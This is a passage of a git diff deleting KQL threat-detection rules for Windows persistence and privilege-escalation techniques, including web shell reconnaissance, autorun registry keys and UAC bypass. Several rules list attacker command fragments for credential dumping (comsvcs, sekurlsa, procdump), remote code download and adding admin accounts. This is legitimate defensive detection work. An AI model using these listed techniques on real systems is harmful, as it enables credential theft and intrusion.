-// Level: medium
-// Description: Detects WMI script event consumers
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.003
-DeviceProcessEvents
-| where FolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/Persistence/WMI_Persistence_-_Script_Event_Consumer_File_Write.kql b/Persistence/WMI_Persistence_-_Script_Event_Consumer_File_Write.kql
deleted file mode 100644
index a3d5d209..00000000
--- a/Persistence/WMI_Persistence_-_Script_Event_Consumer_File_Write.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2018/03/07
-// Level: high
-// Description: Detects file writes of WMI script event consumer
-// Tags: attack.t1546.003, attack.persistence
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe"
\ No newline at end of file
diff --git a/Persistence/Webshell_Detection_With_Command_Line_Keywords.kql b/Persistence/Webshell_Detection_With_Command_Line_Keywords.kql
deleted file mode 100644
index 9eba69fe..00000000
--- a/Persistence/Webshell_Detection_With_Command_Line_Keywords.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community
-// Date: 2017/01/01
-// Level: high
-// Description: Detects certain command line parameters often used during reconnaissance activity via web shells
-// Tags: attack.persistence, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
-DeviceProcessEvents
-| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "cd /d ") or ((FolderPath endswith "\\dsquery.exe" or FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\pathping.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\tracert.exe" or FolderPath endswith "\\ver.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\whoami.exe") or (ProcessVersionInfoOriginalFileName in~ ("dsquery.exe", "find.exe", "findstr.exe", "ipconfig.exe", "netstat.exe", "nslookup.exe", "pathping.exe", "quser.exe", "schtasks.exe", "sysinfo.exe", "tasklist.exe", "tracert.exe", "ver.exe", "VSSADMIN.EXE", "wevtutil.exe", "whoami.exe"))) or (ProcessCommandLine contains " Test-NetConnection " or ProcessCommandLine contains "dir \\") or ((ProcessCommandLine contains " user " or ProcessCommandLine contains " use " or ProcessCommandLine contains " group ") and (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) or (ProcessCommandLine contains " -n " and ProcessVersionInfoOriginalFileName =~ "ping.exe") or (ProcessCommandLine contains " /node:" and ProcessVersionInfoOriginalFileName =~ "wmic.exe"))
\ No newline at end of file
diff --git a/Persistence/Webshell_Hacking_Activity_Patterns.kql b/Persistence/Webshell_Hacking_Activity_Patterns.kql
deleted file mode 100644
index e8ef37ec..00000000
--- a/Persistence/Webshell_Hacking_Activity_Patterns.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/17
-// Level: high
-// Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
-
-// Tags: attack.persistence, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
-DeviceProcessEvents
-| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "comsvcs") or (ProcessCommandLine contains " -hp" and ProcessCommandLine contains " a " and ProcessCommandLine contains " -m") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " user " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " localgroup " and ProcessCommandLine contains " administrators " and ProcessCommandLine contains "/add") or (FolderPath endswith "\\ntdsutil.exe" or FolderPath endswith "\\ldifde.exe" or FolderPath endswith "\\adfind.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\Nanodump.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\fsutil.exe") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains " sekurlsa" or ProcessCommandLine contains ".dmp full" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "process call create" or ProcessCommandLine contains "reg save " or ProcessCommandLine contains "whoami /priv"))
\ No newline at end of file
diff --git a/Persistence/Webshell_Tool_Reconnaissance_Activity.kql b/Persistence/Webshell_Tool_Reconnaissance_Activity.kql
deleted file mode 100644
index 84af50a2..00000000
--- a/Persistence/Webshell_Tool_Reconnaissance_Activity.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Cian Heasley, Florian Roth (Nextron Systems)
-// Date: 2020/07/22
-// Level: high
-// Description: Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands
-
-// Tags: attack.persistence, attack.t1505.003
-DeviceProcessEvents
-| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "CATALINA_HOME" or ProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and (ProcessCommandLine contains "perl --help" or ProcessCommandLine contains "perl -h" or ProcessCommandLine contains "python --help" or ProcessCommandLine contains "python -h" or ProcessCommandLine contains "python3 --help" or ProcessCommandLine contains "python3 -h" or ProcessCommandLine contains "wget --help")
\ No newline at end of file
diff --git a/Persistence/WinSock2_Autorun_Keys_Modification.kql b/Persistence/WinSock2_Autorun_Keys_Modification.kql
deleted file mode 100644
index 62710efd..00000000
--- a/Persistence/WinSock2_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\System\\CurrentControlSet\\Services\\WinSock2\\Parameters" and (RegistryKey contains "\\Protocol_Catalog9\\Catalog_Entries" or RegistryKey contains "\\NameSpace_Catalog5\\Catalog_Entries") and (not((RegistryValueData =~ "(Empty)" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\MsiExec.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\syswow64\\MsiExec.exe")))
\ No newline at end of file
diff --git a/Persistence/Windows_Spooler_Service_Suspicious_Binary_Load.kql b/Persistence/Windows_Spooler_Service_Suspicious_Binary_Load.kql
deleted file mode 100644
index e0568272..00000000
--- a/Persistence/Windows_Spooler_Service_Suspicious_Binary_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye, Thomas Patzke (improvements)
-// Date: 2021/06/29
-// Level: informational
-// Description: Detect DLL Load from Spooler Service backup folder
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675, cve.2021.34527
-DeviceImageLoadEvents
-| where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe"
\ No newline at end of file
diff --git a/Persistence/Windows_Terminal_Profile_Settings_Modification_By_Uncommon_Process.kql b/Persistence/Windows_Terminal_Profile_Settings_Modification_By_Uncommon_Process.kql
deleted file mode 100644
index ac3d2959..00000000
--- a/Persistence/Windows_Terminal_Profile_Settings_Modification_By_Uncommon_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/22
-// Level: medium
-// Description: Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.
-// Tags: attack.persistence, attack.t1547.015
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and FolderPath endswith "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\LocalState\\settings.json"
\ No newline at end of file
diff --git a/Persistence/Winget_Admin_Settings_Modification.kql b/Persistence/Winget_Admin_Settings_Modification.kql
deleted file mode 100644
index 4043350a..00000000
--- a/Persistence/Winget_Admin_Settings_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: low
-// Description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks
-// Tags: attack.defense_evasion, attack.persistence
-DeviceRegistryEvents
-| where InitiatingProcessFolderPath endswith "\\winget.exe" and RegistryKey endswith "\\LocalState\\admin_settings" and RegistryKey startswith "\\REGISTRY\\A"
\ No newline at end of file
diff --git a/Persistence/Winlogon_AllowMultipleTSSessions_Enable.kql b/Persistence/Winlogon_AllowMultipleTSSessions_Enable.kql
deleted file mode 100644
index 9143ea08..00000000
--- a/Persistence/Winlogon_AllowMultipleTSSessions_Enable.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: medium
-// Description: Detects when the 'AllowMultipleTSSessions' value is enabled.
-Which allows for multiple Remote Desktop connection sessions to be opened at once.
-This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
-
-// Tags: attack.persistence, attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData endswith "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions"
\ No newline at end of file
diff --git a/Persistence/Winlogon_Notify_Key_Logon_Persistence.kql b/Persistence/Winlogon_Notify_Key_Logon_Persistence.kql
deleted file mode 100644
index bbc905d0..00000000
--- a/Persistence/Winlogon_Notify_Key_Logon_Persistence.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/30
-// Level: high
-// Description: Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.
-Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
-
-// Tags: attack.persistence, attack.t1547.004
-DeviceRegistryEvents
-| where RegistryValueData endswith ".dll" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\logon"
\ No newline at end of file
diff --git a/Persistence/Wow6432Node_Classes_Autorun_Keys_Modification.kql b/Persistence/Wow6432Node_Classes_Autorun_Keys_Modification.kql
deleted file mode 100644
index 30f433a7..00000000
--- a/Persistence/Wow6432Node_Classes_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Wow6432Node\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\ShellEx\\ColumnHandlers" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers") and (not(RegistryValueData =~ "(Empty)"))
\ No newline at end of file
diff --git a/Persistence/Wow6432Node_CurrentVersion_Autorun_Keys_Modification.kql b/Persistence/Wow6432Node_CurrentVersion_Autorun_Keys_Modification.kql
deleted file mode 100644
index bb361746..00000000
--- a/Persistence/Wow6432Node_CurrentVersion_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey contains "\\Run" or RegistryKey contains "\\RunOnce" or RegistryKey contains "\\RunOnceEx" or RegistryKey contains "\\RunServices" or RegistryKey contains "\\RunServicesOnce" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects")) and (not(((RegistryValueData endswith ".exe\" /burn.runonce" and RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\" and InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" and (RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}" or RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{7037b699-7382-448c-89a7-4765961d2537}")) or (RegistryValueData endswith "-A251-47B7-93E1-CDD82E34AF8B}" or RegistryValueData =~ "grpconv -o" or (RegistryValueData contains "C:\\Program Files" and RegistryValueData contains "\\Dropbox\\Client\\Dropbox.exe" and RegistryValueData contains " /systemstartup")) or (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessFolderPath contains "\\setup.exe") or RegistryValueData =~ "(Empty)" or RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\NoExplorer" or RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\windowsdesktop-runtime-" or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe" and RegistryKey contains "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Wow6432Node") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) and RegistryKey contains "\\Explorer\\Browser Helper Objects\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "\\Explorer\\Browser Helper Objects") or (RegistryValueData endswith " /burn.runonce" and (InitiatingProcessFolderPath contains "\\winsdksetup.exe" or InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" or InitiatingProcessFolderPath contains "\\AspNetCoreSharedFrameworkBundle-") and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\")) or (RegistryValueData endswith "}\\VC_redist.x64.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\VC_redist.x64.exe"))))
\ No newline at end of file
diff --git a/Persistence/Wow6432Node_Windows_NT_CurrentVersion_Autorun_Keys_Modification.kql b/Persistence/Wow6432Node_Windows_NT_CurrentVersion_Autorun_Keys_Modification.kql
deleted file mode 100644
index 54e850a7..00000000
--- a/Persistence/Wow6432Node_Windows_NT_CurrentVersion_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion" and (RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Drivers32") and (not((RegistryValueData in~ ("(Empty)", "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"))))
\ No newline at end of file
diff --git a/Persistence/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql b/Persistence/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql
deleted file mode 100644
index ec001999..00000000
--- a/Persistence/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman
-// Date: 2020/04/21
-// Level: medium
-// Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
-// Tags: attack.t1211, attack.t1059, attack.defense_evasion, attack.persistence
-DeviceProcessEvents
-| where (ProcessCommandLine contains "echo" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "type" or ProcessCommandLine contains "file createnew" or ProcessCommandLine contains "cacls") and ProcessCommandLine contains "C:\\Windows\\Fonts\\" and (ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh" or ProcessCommandLine contains ".reg" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl" or ProcessCommandLine contains ".inf" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs")
\ No newline at end of file
diff --git a/Privilege Escalation/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql b/Privilege Escalation/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql
deleted file mode 100644
index 857eb759..00000000
--- a/Privilege Escalation/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/17
-// Level: high
-// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD")
\ No newline at end of file
diff --git a/Privilege Escalation/Abused_Debug_Privilege_by_Arbitrary_Parent_Processes.kql b/Privilege Escalation/Abused_Debug_Privilege_by_Arbitrary_Parent_Processes.kql
deleted file mode 100644
index 8dbd183f..00000000
--- a/Privilege Escalation/Abused_Debug_Privilege_by_Arbitrary_Parent_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Semanur Guneysu @semanurtg, oscd.community
-// Date: 2020/10/28
-// Level: high
-// Description: Detection of unusual child processes by different system processes
-// Tags: attack.privilege_escalation, attack.t1548
-DeviceProcessEvents
-| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "Cmd.Exe"))) and ((InitiatingProcessFolderPath endswith "\\winlogon.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) and (not((ProcessCommandLine contains " route " and ProcessCommandLine contains " ADD ")))
\ No newline at end of file
diff --git a/Privilege Escalation/Always_Install_Elevated_MSI_Spawned_Cmd_And_Powershell.kql b/Privilege Escalation/Always_Install_Elevated_MSI_Spawned_Cmd_And_Powershell.kql
deleted file mode 100644
index d7eb1414..00000000
--- a/Privilege Escalation/Always_Install_Elevated_MSI_Spawned_Cmd_And_Powershell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
-// Date: 2020/10/13
-// Level: medium
-// Description: Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell"
-// Tags: attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and ((InitiatingProcessFolderPath contains "\\Windows\\Installer\\" and InitiatingProcessFolderPath contains "msi") and InitiatingProcessFolderPath endswith "tmp")
\ No newline at end of file
diff --git a/Privilege Escalation/Always_Install_Elevated_Windows_Installer.kql b/Privilege Escalation/Always_Install_Elevated_Windows_Installer.kql
deleted file mode 100644
index 0c2064b2..00000000
--- a/Privilege Escalation/Always_Install_Elevated_Windows_Installer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
-// Date: 2020/10/13
-// Level: medium
-// Description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege
-// Tags: attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (((FolderPath contains "\\Windows\\Installer\\" and FolderPath contains "msi") and FolderPath endswith "tmp") or (FolderPath endswith "\\msiexec.exe" and ProcessIntegrityLevel =~ "System")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\Avast Software\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avast Software\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Avira\\" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\Google\\Update\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Google\\Update\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe" or (ProcessCommandLine endswith "\\system32\\msiexec.exe /V" or InitiatingProcessCommandLine endswith "\\system32\\msiexec.exe /V") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Sophos\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Aruba_Network_Service_Potential_DLL_Sideloading.kql b/Privilege Escalation/Aruba_Network_Service_Potential_DLL_Sideloading.kql
deleted file mode 100644
index d35ec172..00000000
--- a/Privilege Escalation/Aruba_Network_Service_Potential_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/22
-// Level: high
-// Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where ((FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\msvcr100.dll" or FolderPath endswith "\\msvcp100.dll" or FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\dpapi.dll") and InitiatingProcessFolderPath endswith "\\arubanetsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Bypass_UAC_Using_DelegateExecute.kql b/Privilege Escalation/Bypass_UAC_Using_DelegateExecute.kql
deleted file mode 100644
index 76abcf3f..00000000
--- a/Privilege Escalation/Bypass_UAC_Using_DelegateExecute.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: high
-// Description: Bypasses User Account Control using a fileless method
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\open\\command\\DelegateExecute"
\ No newline at end of file
diff --git a/Privilege Escalation/Bypass_UAC_Using_SilentCleanup_Task.kql b/Privilege Escalation/Bypass_UAC_Using_SilentCleanup_Task.kql
deleted file mode 100644
index 59a7340a..00000000
--- a/Privilege Escalation/Bypass_UAC_Using_SilentCleanup_Task.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nextron Systems
-// Date: 2022/01/06
-// Level: high
-// Description: Detects the setting of the environement variable "windir" to a non default value.
-Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
-The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
